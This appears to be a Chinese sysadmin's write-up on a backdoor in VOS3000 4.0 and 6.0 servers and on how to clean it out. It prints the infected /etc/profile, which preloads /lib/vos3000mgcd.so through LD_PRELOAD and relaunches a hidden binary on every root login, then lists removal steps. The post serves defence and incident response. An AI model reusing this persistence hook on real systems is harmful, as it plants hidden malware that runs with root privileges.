背景
帮朋友做VOS服务器维护,发现VOS3000 4.0、 VOS3000 6.0、均有后门,此后门爆发时将下载一个后门程序,后门程序运行时VOS进程将无法启动。
下面将介绍VOS6.0中如何清理及拦截此后门。
后门位置
- 在
/lib目录下面有两个文件:vos3000mgcd,vos3000mgcd.so。
sudo ps aux 发现两个进程:
root 2676 1.6 0.1 796408 15868 pts/1 Sl 19:36 0:00 /lib/vos3000mgcd
root 3112 0.8 0.8 372776 70348 ? Sl 19:47 0:09 /home/kunshi/vos3000/server/bin/vos3000server -x 1500 -r /home/kunshi/.run/vos3000server.pid- 并且修改了
/etc/profile文件
# /etc/profile
# System wide environment and startup programs, for login setup
# Functions and aliases go in /etc/bashrc
# It's NOT a good idea to change this file unless you know what you
# are doing. It's much better to create a custom.sh shell script in
# /etc/profile.d/ to make custom changes to your environment, as this
# will prevent the need for merging in future updates.
pathmunge () {
case ":${PATH}:" in
*:"$1":*)
;;
*)
if [ "$2" = "after" ] ; then
PATH=$PATH:$1
else
PATH=$1:$PATH
fi
esac
}
if [ -x /usr/bin/id ]; then
if [ -z "$EUID" ]; then
# ksh workaround
EUID=`/usr/bin/id -u`
UID=`/usr/bin/id -ru`
fi
USER="`/usr/bin/id -un`"
LOGNAME=$USER
MAIL="/var/spool/mail/$USER"
fi
# Path manipulation
if [ "$EUID" = "0" ]; then
pathmunge /sbin
pathmunge /usr/sbin
pathmunge /usr/local/sbin
else
pathmunge /usr/local/sbin after
pathmunge /usr/sbin after
pathmunge /sbin after
fi
HOSTNAME=`/bin/hostname 2>/dev/null`
HISTSIZE=1000
if [ "$HISTCONTROL" = "ignorespace" ] ; then
export HISTCONTROL=ignoreboth
else
export HISTCONTROL=ignoredups
fi
export PATH USER LOGNAME MAIL HOSTNAME HISTSIZE HISTCONTROL
export LD_PRELOAD=$LD_PRELOAD:/lib/vos3000mgcd.so
if [ "$EUID" -eq 0 ]
then
JAVA_JAR=0 ps -fe|JAVA_JAR=0 grep vos3000mgcd |JAVA_JAR=0 grep -v grep >/dev/null
if [ $? -ne 0 ]
then
JAVA_JAR=0 nohup /lib/vos3000mgcd >/dev/null 2>&1 &
fi
fi
# By default, we want umask to get set. This sets it for login shell
# Current threshold for system reserved uid/gids is 200
# You could check uidgid reservation validity in
# /usr/share/doc/setup-*/uidgid file
if [ $UID -gt 199 ] && [ "`/usr/bin/id -gn`" = "`/usr/bin/id -un`" ]; then
umask 002
else
umask 022
fi
for i in /etc/profile.d/*.sh ; do
if [ -r "$i" ]; then
if [ "${-#*i}" != "$-" ]; then
. "$i"
else
. "$i" >/dev/null 2>&1
fi
fi
done
unset i
unset -f pathmunge- 环境变量:
export
declare -x G_BROKEN_FILENAMES="1"
declare -x HISTCONTROL="ignoredups"
declare -x HISTSIZE="1000"
declare -x HOME="/root"
declare -x HOSTNAME="VOS3000"
declare -x LANG="zh_CN.UTF-8"
declare -x LD_PRELOAD=":/lib/vos3000mgcd.so" <-------后门执行文件
declare -x LESSOPEN="||/usr/bin/lesspipe.sh %s"
declare -x LOGNAME="root"
declare -x LS_COLORS="rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=01;05;37;41:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lz=01;31:*.xz=01;31:*.bz2=01;31:*.tbz=01;31:*.tbz2=01;31:*.bz=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.rar=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.axv=01;35:*.anx=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=01;36:*.au=01;36:*.flac=01;36:*.mid=01;36:*.midi=01;36:*.mka=01;36:*.mp3=01;36:*.mpc=01;36:*.ogg=01;36:*.ra=01;36:*.wav=01;36:*.axa=01;36:*.oga=01;36:*.spx=01;36:*.xspf=01;36:"
declare -x MAIL="/var/spool/mail/root"
declare -x OLDPWD="/"
declare -x PATH="/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/root/bin"
declare -x PWD="/lib"
declare -x SHELL="/bin/bash"
declare -x SHLVL="1"
declare -x SSH_CLIENT="192.168.3.120 1181 22"
declare -x SSH_CONNECTION="192.168.3.120 1181 192.168.3.100 22"
declare -x SSH_TTY="/dev/pts/0"
declare -x TERM="xterm"
declare -x USER="root"清除步骤
建议做成自启动脚本,定时检查,因为后门程序在VOS主体程序中
取消环境变量:
unset LD_PRELOAD- 杀死相关进程
删除相关文件
sudo rm -rf /lib/vos3000mgcd sudo rm -rf /lib/vos3000mgcd.so还原文件 /etc/profile: 删除以下部分:
export LD_PRELOAD=$LD_PRELOAD:/lib/vos3000mgcd.so if [ "$EUID" -eq 0 ] then JAVA_JAR=0 ps -fe|JAVA_JAR=0 grep vos3000mgcd |JAVA_JAR=0 grep -v grep >/dev/null if [ $? -ne 0 ] then JAVA_JAR=0 nohup /lib/vos3000mgcd >/dev/null 2>&1 & fi fi
重新加载 source /etc/profile
- 重启VOS服务